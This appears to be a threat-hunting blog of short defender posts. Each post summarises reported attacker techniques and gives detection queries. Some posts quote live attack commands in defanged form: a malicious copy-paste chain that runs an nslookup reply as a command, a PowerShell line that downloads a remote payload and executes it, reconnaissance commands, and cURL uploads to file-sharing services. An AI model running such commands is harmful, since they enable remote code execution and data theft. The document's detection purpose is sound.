Know Your Adversary

Hello everyone! It seems the trend is indeed being confirmed: another legitimate employee monitoring tool has ended up in the arsenal of attackers. Malwarebytes reported on a campaign in which attackers disguise Teramind installers as Zoom and Google Meet updates. Teramind is a software platform for employee monitoring and workplace activity analysis. It helps companies track and analyze user actions on computers and across networks to improve security, productivity, and compliance with corporate policies. However, attackers can use such software for unauthorized access to corporate systems. First, we can look for events related to the execution of files signed by Teramind Inc. , for example: event_type: "processcreatewin" AND proc_file_sig: "teramind" You can also check for suspicious communications with teramind[.]co : event_type: "dnsreqwin" AND dns_rname: "teramind.co" See you soon!

Hello everyone! I think we’re all used to attackers abusing remote administration tools, but it seems a new trend is emerging - the abuse of employee monitoring tools. We’ve already seen attackers use Controlio and Mipko Employee Monitor, and in a recent report by Huntress it’s noted that ransomware operators have added yet another similar tool to their arsenal - Network LookOut Net Monitor for Employees. What should you look for? For example, suspicious interaction with networklookout[.]com : event_type: "dnsreqwin" AND dns_rname: "networklookout.com" And, of course, process execution events whose metadata indicates this tool, for example: event_type: "processcreatewin" AND proc_file_productname: "Net Monitor for Employees Pro" See you soon!

Hello everyone! Variants of the Malicious Copy and Paste technique (T1204.004) continue to remain popular among attackers. Today, we’ll look at another example and examine whether it actually affects our detection capabilities. This particular variant was shared by researchers from Microsoft Threat Intelligence . The command that the victim is prompted to execute performs a DNS query to an attacker-controlled server and parses the Name: field from the response: cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1 Despite the originality of the approach, the Name: field contains a fairly ordinary command: powershell.exe -ep bypass -w h -c "iwr hxxp://64.227.40[.]197/o -useb | iex" As you can see, there is nothing particularly novel here, and you could search for similar activity, for example, like this: event_type: "processcreatewin" AND...

Hello everyone! Today we’ll take a look at the Service Stop technique (T1489) and discuss whether it’s worth hunting for its implementation. This technique is a typical behavioral marker for ransomware and wipers. If you check ATT&CK , you’ll see plenty of examples. Typically, such malware is used at the very end of the cyberattack lifecycle and is hardly a good target for proactive threat hunting. However, there are always exceptions. Let’s take a look at the Prometei botnet. During the malware installation process, it stops the WinRM service and then disables it: sc stop WinRM sc config WinRM start= disabled Why is this done? For example, it makes remote administration more difficult. Could such activity be legitimate? Of course! Therefore, this behavioral marker can be a reasonable target for proactive hunting: event_type: "processcreatewin" AND proc_file_path: "sc.exe" AND cmdline: ("winrm" AND "disabled") See you soon!

Hello everyone! The abuse of legitimate cloud services keeps appearing in public cyber threat research reports, so today we’ll look at a couple of examples related both to malware distribution and data exfiltration. So, the first example we’ll look at is a loader from this report. In this case, the attackers abuse PowerShell to download an image containing malicious code from cloudinary[.]com : hxxps://res[.]cloudinary[.]com/dbjtzqp4q/image/upload/v1767455040/optimized_MSI_lpsd9p.jpg In this case, we can search for suspicious PowerShell interactions with cloudinary[.]com : event_type: "dnsreqwin" AND dns_rname: "cloudinary.com" AND proc_file_path: "powershell.exe" Another example is Muddled Libra . The attackers attempted to use several legitimate services for data exfiltration: upload[.]ee uploadnow[.]io filetransfer[.]io filebin[.]io Suspicious communications with these services can also be searched for: event_type: "dnsreq" AN...

Hello everyone! Today we’ll talk about a supply-chain attack related to Notepad++ and look at whether it was possible to detect the artifacts of compromise associated with it. Let’s take a look at the Kaspersky Lab report dedicated to this attack. The first thing that caught my attention is that, once again, the attackers executed a large number of commands to collect information about the compromised system, for example: cmd /c whoami >> a.txt cmd /c tasklist >> a.txt cmd /c systeminfo >> a.txt cmd /c netstat -ano >> a.txt Yes, hunting for this kind of behavioral markers will generate a lot of “noise,” but if you know your infrastructure well, they can absolutely be worked with: event_type: "processcreatewin" AND proc_p_file_path: "cmd.exe" AND cmdline: (*whoami* OR *tasklist* OR *systeminfo* OR *netstat*) Next, the attackers once again abused cURL, and this time they also used a rather suspicious web service - temp[.]sh : curl.exe -F ...